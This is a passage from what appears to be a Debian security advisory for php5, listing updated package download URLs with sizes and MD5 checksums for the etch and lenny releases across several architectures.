http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 12212 9e75c2d0bad91ddd121d5c46e755360d\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 11348 e0e683bff422f973eda014c50d2bca60\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 4908 88190b0ff2787e8a8c015bcbd7181a57\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 17312 f4c9ef90446fe25e8cd9d7a11ed10138\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 23356 fcd7a26f66c7065702c0c00ed70f119c\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 345462 5199aeefe250ec141efa47afcd18e2cf\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_mips.deb\n Size/MD5 checksum: 2414070 a9e0301735bc3bb48f23383967eb05d4\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 12138 42546e557bb86db0a5f3e541976afd52\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 4900 21a213cc2cbd83d73c5b27b9f6c878b2\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 2368910 64a267448b861bd051af1abfbabe7a88\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 33094 3f877ac3825211064a49041fbca106ee\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 8206 0f3a0e6e9b49ee01aff6f6401e74e3cb\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 63412 88618e0af2633a15253e92ded4b79b73\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 34934 79432995d1ffddb14daebf850d510b21\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 31554 7fea1636707354bf7407428a27d38795\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 5238 dc1ee8be27173097a9f5d7ba16be96da\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 35562 5a60ff7ada9a820521b03f0871590b9e\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 2369942 1046b334cd679e807cf56ce7cd0ca0aa\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 4687640 483f99e6db60c78b26181298352309af\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 15648 ced51c3a5f31837bb62ad17fd7a2894c\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 342248 4009fa1cf603d4a96982e3c06a07a5c6\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 216456 7071a61700d419350263c8f3897328ae\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 11260 3df964ea3d0d03910d839300a4e91913\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 23372 6da38108210252adf9863ebd835be800\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 49414 c7a18e0a8c0345e58e2fc44dd0f760cc\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 32308 926993e30e6c169d1ede6f3546bf3f31\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 12428 50b1b56f30669bbbb93438f7bcad824e\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 18464 ca647d8e2bfc76d1773c443d8c8bed96\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 2361012 edc3f684db523093caabf7547038683d\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_mipsel.deb\n Size/MD5 checksum: 17258 815bd4b979c29f2fc83e00a853cdfb01\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 6356 5b03d489a708681fe4d728248da62a2e\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 13756 ca5f1c20db873df06f6a012c79525e8e\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 10118 a2567363af57dfcf9691d80c7c6e6143\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 2443080 1820dff09e7652b38b810be002100499\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 36010 44be1e0e4ef839432e945dc9969f9ac7\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 26794 0bd9abc2e4d221a353d92e580d3d1969\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 36486 181249f78ab7032bb9a5d85be3d57da5\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 37012 e7bdea05d06b9f9cbf943751cdce46b0\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 37722 ff95f84599c1bc8acb066b63a4d16fb9\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 2395642 f25db1183bd763f156a553d1ae4da610\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 14748 bb755f096fb464b8a892d4c652835a69\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 219940 2b6799cef3190db6db34adebb4848fda\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 20244 43fecbc5a5d7b345d495bcae3252764f\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 6742 b99c0c45318e6b228c1ba5dbe089a471\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 38054 25cf7ad11527dae03e1ef3604c6bd8da\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 18458 7fa7c42b48c2392876927ca58435cb0e\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 53962 a3f8f8346f9fa93b9d5c029e02f12456\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 70316 070e13b75e1cba8bd8f89ae27a1c8e6b\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 19180 ec55dabf5357584f8e25be0042c7844f\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 4750566 91664501656bce158df70eb341f6613a\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 344546 dde478197a7294ab3aaf30bff3e171c2\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 2442670 61166501966bb8fa04e27b4bc7316432\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_powerpc.deb\n Size/MD5 checksum: 12702 76cc7091c6db71ef9dd9e69ce0b00579\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 221368 a6e658b97893d8b77ccaaf04e35e42bd\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 9194 fa30b60689f9aa411a6d30eea244c622\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 4894702 977e1d064ace840b45e1a73f27ab4a4a\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 13404 39e1e3f533d15d5a408bb358df8798b1\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 36168 6cc918284ec969691d556523703fea66\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 56330 f6fc9ed26260838fe829b4d89fcd14e0\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 18182 f4a9628e3fe287545907af24cfcc849a\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 19326 382049adce2f0bd419ebc82a3526e596\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 72592 337a5ff80194823a1181c3875ae8cf00\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 11960 86d90439ba65beaba664bf01646e26eb\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 19582 96cf40da9542bee18aa4906711f27a7f\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 2536368 9e6c641dbf7764b368672e9c8f3c2e08\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 13444 138cf346d0b753e15ef936ec889dd1e8\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 25040 ef129928ee072d2370e5d9534353a8af\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 5132 3f5a63cbafcecf9942c4e474bffa8c67\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 5478 8d4952bc62e003074e418b6824301c2a\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 2465860 c1f7086621fe0756f8e5956554a25fee\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 37188 cfcd07d6ec12fe61e457b82dff850e49\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 2535908 87d8dd0d86f48e162e4b8710bb8eaf60\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 40524 7c3cc8e5020d14d2c2fc84da6eafe24e\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 342210 a491997e72607223b8d7c5cfdde973fa\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 39198 062f74d7158c086afe3c8436f7a1cdd0\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_s390.deb\n Size/MD5 checksum: 37252 ba27d42fb587566e370c2d1bc536e9f4\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 2333980 dd28760adfbc4ca01a5f0ca5db64989f\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 10774 bb3753599a2ae5574d011f2cc11740d4\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 62210 b66be0f1e76e37489333dc91de9744d6\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 16586 e0b266c39c36a5e667cca229f43a28eb\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 4525670 258ab01f6bfc79f2bd4d825cb1145a9a\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 8276 4e7da0ff28b78901a191cf9425362681\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 24652 7ea91609c3f642a21513ee451d405234\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 11678 6c734dee3e19e59242719233f61aec5f\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 33304 5683a3c91dba8aa7d19dd976119f795b\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 2281860 31210fbdbcf3c1d3040626b162587e7a\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 32592 b0dc42cc6cc8fd6990b3c7e548b91095\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 17458 d349438d7a88740807d029692c329b37\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 4872 81f03284e1f322a6535c31c29fa3f665\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 2333472 0857cd1d3b2795ed7acd0300cbc840b4\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 34914 28f290db6e698eb55ac22a356e37e542\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 33086 4b2022444cd5a03142f9976a36e45076\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 31526 76a67289d992d7df2e0f831f8f76a271\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 215706 5350f154ebe757f7644cc6c7d16401f7\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 16244 c653f76328aeceea738bb74d31b44130\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 12630 d33844a8e4307574c0de0f91e6d1b1e0\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 342314 c9b88048c81be7f342f8d58eb4809bbe\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 47952 8ba01a246dbf5197ea4557ed702eabbc\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch15_sparc.deb\n Size/MD5 checksum: 4654 5f120de17b90a1a60dff8cb5c73c600e\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1-1+lenny3.dsc\n Size/MD5 checksum: 2520 e865d9ad2851dcf9f83d71c148423c84\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 12173741 b80fcee38363f031229368ceff8ced58\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1-1+lenny3.diff.gz\n Size/MD5 checksum: 160126 9a0f8b8a480b0d95ddecd7f82593e108\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/php5/php5_5.2.6.dfsg.1-1+lenny3_all.deb\n Size/MD5 checksum: 1078 68c3a9e139c81103fce02940c5e1951e\n http://security.debian.org/pool/updates/main/p/php5/php-pear_5.2.6.dfsg.1-1+lenny3_all.deb\n Size/MD5 checksum: 334564 b4c42ff4056be09e0cf2102445518736\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 71712 b820d53d822b0ddb00d4928e6e232e9a\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 8928 b7a52eb73120fc89a282195829318789\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 13802 7bcafa8841dc31e86a8a8d94ab4d04f3\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 19676 9fdc3bed1d775d784a1547c7a3df78ba\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 12334 aee151fe4f6a3a7061f21f4ff031f31a\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 17670 b3d36aa88ea83e03ccaf6c92f85e4498\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 5080 fdf892faed973e797cffdc5571b1042a\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 2674408 e4457b886974643f04d52341717827da\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 15822 66a7f1a85356624f5f9772d7e31bac1c\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 37514 c3627c5319d269416dfe8b0bb97338fb\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 25010 13a28b75ccfe9c47ae1661d7a8fda542\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 5163370 cdd01a0fea962714adab1154d7b41dab\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 27608 d833a8cc9ba83da449f1a2373c85f3fc\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 5412 64f5a28d948627e6b03d8a154259f849\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 37168 4dd05e75f1d5780fe8de13d9c07d7a9d\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 14060 df8db38d9a072e2ced4ea19226ac1168\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 19512066 1efdd53c61a6cf28dce0543462728efc\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 2673040 787a29a967a3e6458e1dcfcaa3ef7608\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 39406 0c83e84941cac2840ae761c7742e915f\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 2598434 1a7a352b998991eb506d136406fc4da1\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 36650 2bf015e1dce330ae3bd3645a2454540c\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 362786 1175ddaf9788bfa1a1fb2e5f04396761\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 368398 06e35e7ffff7b3c854f09b96feb4b181\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 57878 1e48fc0c9f2b32c2652d6bafca2c6a9d\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_alpha.deb\n Size/MD5 checksum: 41632 593a7515ba3746cdd4de8484eea1fe65\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 5428 6ee59ecf0e008a8a230e28f907116d4f\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 9474 b0ef7faa0cc3f1cb1c3fb41b5ce05c30\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 48452 3ed659cf2aa7e178bfe049a5d5958f6a\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 366086 bdb6555ef6bfba1d4d3a4466d5727325\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 8300332 b282cbf7b62b897417eac1d3be14ef87\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 14190 62126774d34edcb24786676203fb08bd\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 2614610 b309b2993a0aba0f495c57aaa909a274\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 40912 94acf21a9170d6246259be00fb877386\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 37046 baf59ec2824c389395a04a29d6dc8909\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 37864 caecc5e8c8c5c0d4e0ed964365db2f92\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 12350 df28abc45cbd11af84d28ac91b930f97\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 13940 2357126080c8576f77095246abf9f37d\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 2563068 80d0fc43130775d658af3f87ecea644f\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 28064 85097f2998fd151d955f572964e5d422\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 25260 ff405813e6b71d4b90611eec50e96a8f\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 5100 d0ea290a8c385c6aba602d28e4d2cd39\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 367858 5b8e49b3b892569219baf60a896dde95\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 56882 99560785fc2489866a1cdc32ba3df138\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 18134 5c8e5ab6ac2f0c482222787bd7eb29c5\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 73714 4aae04e66b706291291e2b03ebcea83f\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 5083216 428f888c54d8a5ebf783b6345d629a3f\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 2615884 834747cef1119734261264d24094c5a2\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 38098 00258c838c19400ec990654cee6f7a96\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 16524 9b3ecd5606fa66b221b111b821018e54\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 20160 b9f10192699c5c6a2613f595f5c40325\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny3_amd64.deb\n Size/MD5 checksum: 39780 7a8fe62fdcd1b72a4be02ee2507b292b\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 34008 0e99ac4c79e39657dbb2c47a851f0f6c\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 18038 7e059b3bc36ab4ffa3f5363c71985df4\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny3_arm.deb\n Size/MD5 checksum: 11272 8b616635d92a42f38610e30cb6362782\n 